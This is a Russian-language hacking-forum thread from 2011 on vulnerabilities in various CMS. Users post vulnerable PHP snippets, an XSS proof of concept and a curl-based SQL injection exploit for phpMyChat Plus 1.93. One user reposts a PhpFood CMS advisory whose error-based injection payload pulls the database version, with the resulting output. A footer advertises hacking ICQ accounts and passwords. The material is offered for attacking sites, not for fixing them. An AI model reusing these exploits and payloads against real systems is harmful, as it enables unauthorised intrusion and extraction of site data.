Старый 19.04.2011, 23:11   #11
Spam
RAM 256MB
 
Аватар для Spam
 
Регистрация: 22.07.2009
Сообщений: 391
Spam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всем
Spam вне форума

По умолчанию Уязвимости различных CMS


Цитата:
Сообщение от andersen62 Посмотреть сообщение
может у кого-то завалялись под joomla иньекции?
А ветка?
__________________
Хакер — не преступник. Взлом для искусства. Смысл — в свободе.
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 21.04.2011, 13:12   #12
xhugo
RAM 32MB
 
Аватар для xhugo
 
Регистрация: 09.09.2010
Сообщений: 46
xhugo скоро придёт к известности
xhugo вне форума
По умолчанию Ответ: Уязвимости различных CMS

cms xstatus
send.php
PHP код:
include('db.php');
    
// прилетают переменные
    
$radio $_POST['radio'];
    
$txt $_POST['txt'];
    
$subm $_POST['subm'];
    
$nick $_POST['nick']; 
    
$icq $_POST['icq'];
    
$ip $_SERVER['REMOTE_ADDR'];
    
// Проверочко    
    
$radio stripslashes($radio);
    
$radio htmlspecialchars($radio);
    
$txt stripslashes($txt);
    
$txt htmlspecialchars($txt);
    
$nick stripslashes($nick);
    
$nick htmlspecialchars($nick);
    
$icq stripslashes($icq);
    
$icq htmlspecialchars($icq);
    
/*      */    
    
$result mysql_query("INSERT INTO `smiles` (`ip`,`status`,`img`,`name`,`icq`,`new`,`repa`,`ok`) VALUES ('$ip','$txt','$radio','$nick','$icq','1','0','0')"); 
нет никакого экрана, перевод спец. символов в htmlspecialchars
тупо пишем в поле 2'2
и ошибка.
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 16.05.2011, 20:09   #13
denwers
RAM 32MB
 
Аватар для denwers
 
Регистрация: 11.03.2011
Сообщений: 47
denwers Новичок
denwers вне форума
По умолчанию Ответ: Уязвимости различных CMS

Цитата:
Сообщение от Spam Посмотреть сообщение
язык запрос sql знаком?
ну да читал про это, тольок не получается пока что делать, никак не пойму смысл инъекции - перебор запросов к базе sql? если да то каким образом делать этот перебор,нужно знать столбцы?
__________________
:russian:
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 17.05.2011, 00:51   #14
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Уязвимости различных CMS

Цитата:
Сообщение от denwers Посмотреть сообщение
никак не пойму смысл инъекции
Суть иньекции в следующем место где не фильтруюца запрос к БД щитается скулей, перебор столбцов и пр. это уже ее раскрутка, дабы успешно ее провести нужны знания в области mysql.
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 17.05.2011, 20:07   #15
xhugo
RAM 32MB
 
Аватар для xhugo
 
Регистрация: 09.09.2010
Сообщений: 46
xhugo скоро придёт к известности
xhugo вне форума
По умолчанию Ответ: Уязвимости различных CMS

phpMyChat Plus 1.93
avatar.php
XSS
PHP код:
/*                 */ 
<input type="hidden" name="pmc_password" value="<?php echo(stripslashes(($_GET['pmc_password']))); ?>" /> 
/*               */
PoC:
Код:
avatar.php?pmc_password="><script>alert()</script>
SQLi plus/lurking.php
PHP код:
<?php 
 
// SQLi phpMyChat Plus 1.93 | exploit by xhugo 
  
function ex($url
  { 
  
$ch curl_init(); 
  
curl_setopt($chCURLOPT_URL,$url.'/plus/lurking.php'); 
  
curl_setopt($chCURLOPT_HEADERfalse); 
  
curl_setopt($chCURLOPT_RETURNTRANSFERtrue); 
  
curl_setopt($chCURLOPT_COOKIEFILE"cookie.txt"); 
  
curl_setopt($chCURLOPT_POSTtrue); 
  
curl_setopt($chCURLOPT_POSTFIELDS''); 
  
curl_setopt($chCURLOPT_CONNECTTIMEOUT30); 
  
curl_setopt($chCURLOPT_USERAGENT'x'); 
  
$data curl_exec($ch); 
  
curl_close($ch); 
  return 
$data
  } 
  
/* 
  cookies.txt: 
  CookieUsername=SQLi; CookieStatus=SQLi; CookieRoom=x; CookieLang=x; CookieUserSort=x 
  */ 
?>
Добавлено через 6 часов 22 минуты 48 секунд
Цитата:
Суть иньекции в следующем место где не фильтруюца запрос к БД щитается скулей, перебор столбцов и пр. это уже ее раскрутка, дабы успешно ее провести нужны знания в области mysql.
эм..
скуль,скуля,sql - язык структурированных запросов.
а вот уже где как говорите нет фильтрации ,делаете раскутку т.п. вот это уже - скуль инъекции(sql-injection)!
  Ответить с цитированием
Последний раз редактировалось xhugo; 17.05.2011 в 20:07. Причина: Добавлено сообщение
Ответ: Уязвимости различных CMS
Старый 29.08.2011, 19:30   #16
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Уязвимости различных CMS

Код:
PhpFood CMS v2.00 SQL Injection Vulnerability
##################################################  ##############################***8203;###################  ##########
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 3 July, 2011 ##
##################################################  ##############################***8203;###################  ##########

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

##################################################  ##############################***8203;###################  ##########

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1


[ See It ]

Duplicate entry '5.0.91-community1' for key 1 

[ FIX ]

dunno :">


##################################################  ##############################***8203;###################  ##########

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,Ry  anAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_  joe,k4l0ng666,n4sss,r3m1ck,k4m***8203;pr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 

[ NOTE ]

[+] Stop Dreaming , Lets Do it !
[+] Jangan Takut , Luka Pasti Akan Sembuh 

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot